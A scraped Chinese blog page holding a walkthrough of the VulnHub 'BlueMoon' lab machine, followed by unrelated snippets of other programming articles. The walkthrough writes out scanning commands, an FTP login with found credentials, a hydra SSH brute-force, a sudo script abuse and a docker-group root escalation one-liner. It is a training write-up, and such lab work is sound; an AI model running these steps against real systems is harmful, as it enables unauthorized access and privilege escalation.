当前位置：首页 > news >正文

VulnHub：BlueMoon

news 2025/7/15 0:02:05

准备工作

靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。

信息收集

主机发现

攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

目标靶机ip为：192.168.31.228

端口扫描

nmap 192.168.31.228 -A -p- -T4

目标靶机开放了21，22，80端口。

21端口ftp服务，vsftpd 3.0.3
22端口ssh服务，OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80端口http服务，Apache httpd 2.4.38

web站点信息收集

访问http服务，首页如下：

没什么信息，目录扫描dirsearch -u http://192.168.31.228，没信息，换个字典。

dirsearch -u http://192.168.31.228 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

找到一个隐蔽的目录hidden_text。访问结果如图：

Thank You指向另一个路径，访问得到一个二维码。

扫描内容如下：

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

渗透

FTP登录

根据web信息收集中二维码扫描内容，可知涉及FTP的简单的shell脚本的使用，ftp用户名是userftp，密码是ftpp@ssword，直接登录即可。这里我写的shell脚本，来显示文件列表（纯纯试一下ftp的简单shell脚本如何使用，都给出了用户名和密码直接登录即可，最终目的就是拿到ftp服务器中的两个文件）

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary                          # 设定传输方式为二进制方式
pwd                             # 查看FTP服务器上的当前工作目录
ls                              # 显示文件列表
bye                             # 推出ftp会话
EOF

执行shell脚本得到ftp当前工作目录，和文件列表。

修改一下shell脚本，下载FTP服务器上的文件。

#!/bin/bash
ftp -inv 192.168.31.228 << EOF  # EOF是一个分界标志
user userftp ftpp@ssword
binary  
get information.txt
get p_lists.txt
bye                             
EOF

执行脚本得到一个字典文件p_lists.txt和information.txt，information.txt内容如下：

Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.

存在一个用户robin，并给出了密码字典，爆破吧。

ssh爆破

给出了用户名和字典，hydra爆破ssh。

hydra -l robin -P p_lists.txt ssh://192.168.31.228

得到密码：k4rv3ndh4nh4ck3r。

ssh登录过程中有点小问题，提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! ，解决方法如下：

ssh-keygen -R 192.168.31.228

之后正常登录即可。

get user1.txt!

接下来找到了user2.txt，但是仅jerry才有读权。

提权

sudo提权

sudo提权，sudo -l，发现可以通过/home/robin/project/feedback.sh提权到jerry。

feedback.sh当前仅有rx权限，放弃写入反弹shell的方法，直接执行，提示需要输入名字和目标机器。

sudo -u jerry ./feedback.shEnter Your Name:随便填一个
Enter You FeedBack About This Target Machine:/bin/bash

成功切换到jerry，注意到jerry用户加入了docker用户组。

获得一个交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

get user2.txt!

docker容器提权

当前jerry用户是普通用户，且加入了docker组。有一个提权方式——普通用户利用docker容器提权。

补充：为什么能利用docker容器提权？因为用户创建一个docker容器后，容器内默认是root账户，会自动在命令前添加sudo。一个普通用户只要加入docker组就等同于root。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

提权成功。

get root.txt!🎆

VulnHub：BlueMoon

准备工作靶机下载地址，下载完成后使用virtualbox打开虚拟机，网络设置修改为桥接。信息收集主机发现攻击机ip：192.168.31.218，nmap扫描攻击机同网段存活主机。 nmap 192.168.31.0/24 -Pn -T4 目标靶机ip为：192…...

编程日记 2024/8/16 17:40:54

处理filter里抛出的异常

Filter 的异常是在 org.apache.catalina.core.ApplicationFilterChain.internalDoFilter()这里扔出来的。Filter是tomcat负责调用执行的，所以会比 servlet（尤其是SpringMVC 的dispatcherServlet ）先执行，所以 Filter 里的错误&…...

编程日记 2024/8/16 17:39:53

IndexedDB深度解析：JavaScript的客户端数据库

IndexedDB是一个在用户浏览器中运行的低等级API，用于存储大量结构化数据。作为NoSQL数据库，IndexedDB为Web应用程序提供了丰富的数据存储能力，支持键值对存储、索引、事务和复杂查询等功能。本文将详细介绍IndexedDB的基本概念、工作原理、使…...

编程日记 2024/8/16 17:38:51

C语言中的函数指针和返回值为数组的函数指针对比

函数指针 //定义一个函数指针，函数的参数是int型，返回值为int typedef int （*func)(int);//定义一个函数指针，函数的参数是int*型，返回值为int* typedef int* (*func)(int *);定义一个返回值为数组指针的函数 //定义…...

编程日记 2024/8/16 17:37:50

根据字符串的长度和字符值的大小来对字符串切片进行排序

在 Go 语言中，根据字符串的长度和字符值的大小来对字符串切片进行排序。示例如下: package mainimport ("fmt""sort" )// 自定义类型，以实现排序接口 type byLengthAndValue []string// 实现 sort.Interface 的 Len 方法 func (s b…...

编程日记 2024/8/16 17:35:48

RabbitMQ 的工作原理

下面是rabbitmq 的工作原理图解 1、客户端连接到消息队列服务器，打开一个channel。 2、客户端声明一个exchange，并设置相关属性。 3、客户端声明一个queue，并设置相关属性。 4、客户端使用routing key， 在exchange和queue 之间…...

编程日记 2024/8/16 17:34:46

WPF 资源、引用命名空间格式、FrameworkElement、Binding、数据绑定

资源对象级别独立文件静态资源使用(StaticResource)指的是在程序载入内存时对资源的一次性使用，之后就不再去访问这个资源了。动态资源使用（DynamicResource）使用指的是在程序运行过程中仍然会去访问资源。显然，如果你确定…...

编程日记 2024/8/16 17:32:44

vue3-03-创建响应式数据的几种方法

响应式数据一、 ref 创建：响应式数据1）ref 创建：基本类型的响应式数据2）ref 创建：对象类型的响应式数据3）volar 插件自动添加 .value4）customRef 自定义 ref 二、 reactive 创建：响…...

编程日记 2024/8/16 17:31:43

stm32智能颜色送餐小车（openmv二维码识别+颜色识别+oled显示）

大家好啊，我是情谊，今天我们来介绍一下我最近设计的stm32产品，我们在今年七月份的时候参加了光电设计大赛，我们小队使用的就是stm32的智能送餐小车，虽然止步于省赛，但是还是一次成长的经验吧，那…...

编程日记 2024/8/16 17:28:39

对接的广告平台越多，APP广告变现的收益越高？

无论是游戏、社交、工具应用类APP还是泛娱乐类APP，流量变现的方式主要有广告、内购、订阅三种方式。其中，广告变现是门槛最低、适用最广的变现方式。只要APP有流量，就可以进行广告变现，让APP的流量快速转化为商业价值。作为最常…...

编程日记 2024/8/16 17:25:36

LINUX原始机安装JDK

文章目录下载 JDK压缩包创建jdk文件夹sftp 远程上传解压缩 tar -zxvf 包名配置环境变量刷新环境变量验证是否安装成功安装JAVA 依赖yum更新及替换镜像curl 命令下载更新更新yum依赖判断repo文件是否存在生成缓存、启用阿里云镜像重新下载java依赖再次验证hello world 下载 J…...

编程日记 2024/8/16 17:24:35

MR400D工业级带网口4G DTU：RS232/RS485 TO LTE深度测评

在物联网技术日新月异的今天，数据传输的效率和稳定性成为了各行各业关注的焦点。作为一款集先进性与实用性于一身的物联网设备，工业级带网口的4G DTU（数据传输单元）以其强大的功能特性和广泛的应用场景，赢得了市场的广…...

编程日记 2024/8/16 17:23:33

第四范式发布AI+5G视频营销产品助力精准获客与高效转化

产品上新 Product Release 今天，第四范式AI5G视频电话互动营销产品全新发布。相较于以往销效率低、互动差、转化差的传统电话外呼和短信营销方式，视频电话互动营销基于AI、5G等技术，可让用户接听电话时观看个性化视频广告并实时互动&#xf…...

编程日记 2024/8/16 17:21:31

DVWA-IDS测试（特殊版本）

起因浏览DVWA历史更新记录发现有版本带有IDS插件，可以用于平时没有相关设备等场景演示用，所以开启本次测试。下载官方最新版本是移除了IDS插件，原因是“从不使用”，所以需要下载移除该插件之前的版本。 https://github.com/…...

编程日记 2024/8/16 17:20:30

轻度自闭症的温柔启航：星启帆的康复之旅

在儿童成长的道路上，自闭症作为一种复杂的神经发展障碍，给许多家庭带来了挑战与困扰。轻度自闭症，作为自闭症谱系中的一个类型，其症状表现相对较轻，但同样需要我们的关注与科学的干预。星启帆自闭症儿童康复机构&#…...

编程日记 2024/8/16 17:19:29

一、OpenTK简介

文章目录一、历史和发展二、功能和优势（一）强大的图形渲染功能（二）跨平台支持（三）与 C# 的紧密集成（四）开源和活跃的社区（五）性能优化三、适用场景（一）游戏开发（二）科学计算可视化（三）虚拟现实和增强现实应用（四）图形用户界面开发（五）教育和培训应用（六）…...

编程日记 2024/8/16 17:17:27

Dom4j详细介绍

Dom4j 1.1 解析概览将数据存储为XML格式后，程序化地访问这些数据变得至关重要。虽然Java基础的IO操作能够实现这一目标，但这一过程往往既复杂又繁琐，尤其是在处理大型文件或需要频繁读写操作的场景下。为了解决这些问题，开发者…...

编程日记 2024/8/16 17:16:25

thissuper

this&super 一、 this this关键字表示调用的是当前类的成员变量或者成员方法一般情况下，可以省略this关键字直接调用成员变量以及成员方法但当方法的形参与成员变量同名时，如果要在方法内使用成员变量，必须添加this关键字指明使用的是…...

编程日记 2024/8/16 17:14:22

cv::normalize（）

cv::normalize()函数是OpenCV库中用于对矩阵或图像数据进行归一化处理的工具。归一化是图像处理和计算机视觉中常见的预处理步骤，它可以确保数据在一定范围内，从而有助于后续的处理和算法的稳定性和性能。cv::normalize()函数可以将输入矩阵的值缩放到一…...

编程日记 2024/8/16 17:12:20

【Python快速入门和实践016】Python常用脚本-对视频抽取指定帧数并保存

一、功能介绍这段代码的功能是从一个视频文件中抽取指定数量的帧，并将这些帧保存为图像文件。步骤如下： 设置路径和参数： video_path：视频文件的路径。image_folder：保存抽取图像的目录。num_frames_to_extract&#…...

编程日记 2024/8/16 17:09:17

解锁数据库简洁之道：FastAPI与SQLModel实战指南

在构建现代Web应用程序时，与数据库的交互无疑是核心环节。虽然传统的数据库操作方式（如直接编写SQL语句与psycopg2交互）赋予了我们精细的控制权，但在面对日益复杂的业务逻辑和快速迭代的需求时，这种方式的开发效率和可…...

编程新知 2025/7/8 21:38:11

Reasoning over Uncertain Text by Generative Large Language Models

https://ojs.aaai.org/index.php/AAAI/article/view/34674/36829https://ojs.aaai.org/index.php/AAAI/article/view/34674/36829 1. 概述文本中的不确定性在许多语境中传达，从日常对话到特定领域的文档（例如医学文档）（Heritage 2013；Landmark、Gulbrandsen 和 Svenevei…...

编程新知 2025/7/13 18:55:28

云原生玩法三问：构建自定义开发环境

云原生玩法三问：构建自定义开发环境引言临时运维一个古董项目，无文档，无环境，无交接人，俗称三无。运行设备的环境老，本地环境版本高，ssh不过去。正好最近对腾讯出品的云原生 cnb 感兴趣&…...

编程新知 2025/7/13 11:15:02

Spring是如何解决Bean的循环依赖：三级缓存机制

1、什么是 Bean 的循环依赖在 Spring框架中，Bean 的循环依赖是指多个 Bean 之间‌互相持有对方引用‌，形成闭环依赖关系的现象。多个 Bean 的依赖关系构成环形链路，例如：双向依赖：Bean A 依赖 Bean B，同时 Bean B 也依赖 Bean A（A↔B）。链条循环： Bean A → Bean…...

编程新知 2025/7/9 9:20:33

回溯算法学习

一、电话号码的字母组合 import java.util.ArrayList; import java.util.List;import javax.management.loading.PrivateClassLoader;public class letterCombinations {private static final String[] KEYPAD {"", //0"", //1"abc", //2"…...

编程新知 2025/7/13 22:50:13

面向无人机海岸带生态系统监测的语义分割基准数据集

描述：海岸带生态系统的监测是维护生态平衡和可持续发展的重要任务。语义分割技术在遥感影像中的应用为海岸带生态系统的精准监测提供了有效手段。然而，目前该领域仍面临一个挑战，即缺乏公开的专门面向海岸带生态系统的语义分割基准数据集。受…...

编程新知 2025/7/13 12:53:56

多模态图像修复系统：基于深度学习的图片修复实现

多模态图像修复系统：基于深度学习的图片修复实现 1. 系统概述本系统使用多模态大模型（Stable Diffusion Inpainting）实现图像修复功能，结合文本描述和图片输入，对指定区域进行内容修复。系统包含完整的数据处理、模型训练、推理部署流程。 import torch import numpy …...

编程新知 2025/7/9 18:01:18